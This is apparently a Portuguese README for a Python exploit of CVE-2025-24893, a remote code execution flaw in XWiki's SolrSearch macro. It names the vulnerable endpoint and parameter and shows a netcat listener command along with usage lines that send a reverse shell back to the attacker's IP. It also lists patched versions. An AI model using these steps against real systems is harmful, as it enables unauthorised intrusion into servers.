
Exploit de Execução Remota de Código (RCE) no XWiki
Exploit de Execução Remota de Código (RCE) no XWiki
Um exploit em Python3 para a CVE-2025-24893, uma vulnerabilidade crítica de Execução Remota de Código Não Autenticada (RCE) que afeta a plataforma XWiki.
Este script explora uma falha de Injeção de Código/Expressão (CWE-95) dentro do componente da macro SolrSearch. A falha permite que atacantes executem código Groovy/Java arbitrário no sistema operacional subjacente. O exploit realiza automaticamente a codificação em Base64 para evitar as limitações de interpretação de comandos da função Runtime.getRuntime().exec() do Java.
/bin/get/Main/SolrSearch (através do parâmetro text)nc -lvnp 4444
python3 CVE-2025-24-893.py <URL_ALVO> <SEU_IP_VPN> <SUA_PORTA>
Exemplo:
python3 CVE-2025-24-893.py http://domain.local 10.10.14.229 4444
requestsPara instalar a dependência necessária:
pip install requests
Atualize a sua instância do XWiki para uma das versões oficiais corrigidas: 15.10.11, 16.4.1, 16.5.0-rc-1 (ou superiores).
Este script foi desenvolvido exclusivamente para fins educacionais, auditorias de segurança autorizadas e testes de invasão (Pentest). O autor não se responsabiliza por qualquer uso indevido, danos ou atividades ilegais causadas por esta ferramenta. A utilização deste script contra alvos sem autorização prévia é estritamente ilegal.